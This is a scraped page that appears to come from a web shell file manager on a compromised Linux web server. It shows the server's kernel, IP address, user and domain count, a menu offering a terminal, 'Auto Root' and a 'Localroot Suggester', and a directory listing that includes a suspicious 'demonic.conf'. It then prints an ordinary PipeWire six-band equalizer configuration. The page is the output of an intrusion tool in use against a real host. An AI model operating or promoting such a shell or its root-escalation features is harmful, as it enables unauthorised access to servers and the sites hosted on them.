Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
pipewire /
filter-chain /
Delete
Unzip
Name
Size
Permission
Date
Action
demonic.conf
2.16
KB
-rw-r--r--
2026-09-02 06:51
sink-dolby-surround.conf
1.57
KB
-rw-r--r--
2026-09-02 06:51
sink-eq6.conf
2.54
KB
-rw-r--r--
2026-09-02 06:51
sink-make-LFE.conf
2.06
KB
-rw-r--r--
2026-09-02 06:51
sink-matrix-spatialiser.conf
1.3
KB
-rw-r--r--
2026-09-02 06:51
sink-mix-FL-FR.conf
1.29
KB
-rw-r--r--
2026-09-02 06:51
sink-upmix-5.1-filter.conf
5.86
KB
-rw-r--r--
2026-09-02 06:51
sink-virtual-surround-5.1-kemar.conf
6.72
KB
-rw-r--r--
2026-09-02 06:51
sink-virtual-surround-7.1-hesuvi.conf
6.35
KB
-rw-r--r--
2026-09-02 06:51
source-duplicate-FL.conf
1.74
KB
-rw-r--r--
2026-09-02 06:51
source-rnnoise.conf
1.41
KB
-rw-r--r--
2026-09-02 06:51
Save
Rename
# 6 band sink equalizer # # Copy this file into a conf.d/ directory such as # ~/.config/pipewire/filter-chain.conf.d/ # context.modules = [ { name = libpipewire-module-filter-chain args = { node.description = "Equalizer Sink" media.name = "Equalizer Sink" filter.graph = { nodes = [ { type = builtin name = eq_band_1 label = bq_lowshelf control = { "Freq" = 100.0 "Q" = 1.0 "Gain" = 0.0 } } { type = builtin name = eq_band_2 label = bq_peaking control = { "Freq" = 100.0 "Q" = 1.0 "Gain" = 0.0 } } { type = builtin name = eq_band_3 label = bq_peaking control = { "Freq" = 500.0 "Q" = 1.0 "Gain" = 0.0 } } { type = builtin name = eq_band_4 label = bq_peaking control = { "Freq" = 2000.0 "Q" = 1.0 "Gain" = 0.0 } } { type = builtin name = eq_band_5 label = bq_peaking control = { "Freq" = 5000.0 "Q" = 1.0 "Gain" = 0.0 } } { type = builtin name = eq_band_6 label = bq_highshelf control = { "Freq" = 5000.0 "Q" = 1.0 "Gain" = 0.0 } } ] links = [ { output = "eq_band_1:Out" input = "eq_band_2:In" } { output = "eq_band_2:Out" input = "eq_band_3:In" } { output = "eq_band_3:Out" input = "eq_band_4:In" } { output = "eq_band_4:Out" input = "eq_band_5:In" } { output = "eq_band_5:Out" input = "eq_band_6:In" } ] } audio.channels = 2 audio.position = [ FL FR ] capture.props = { node.name = "effect_input.eq6" media.class = Audio/Sink } playback.props = { node.name = "effect_output.eq6" node.passive = true } } } ]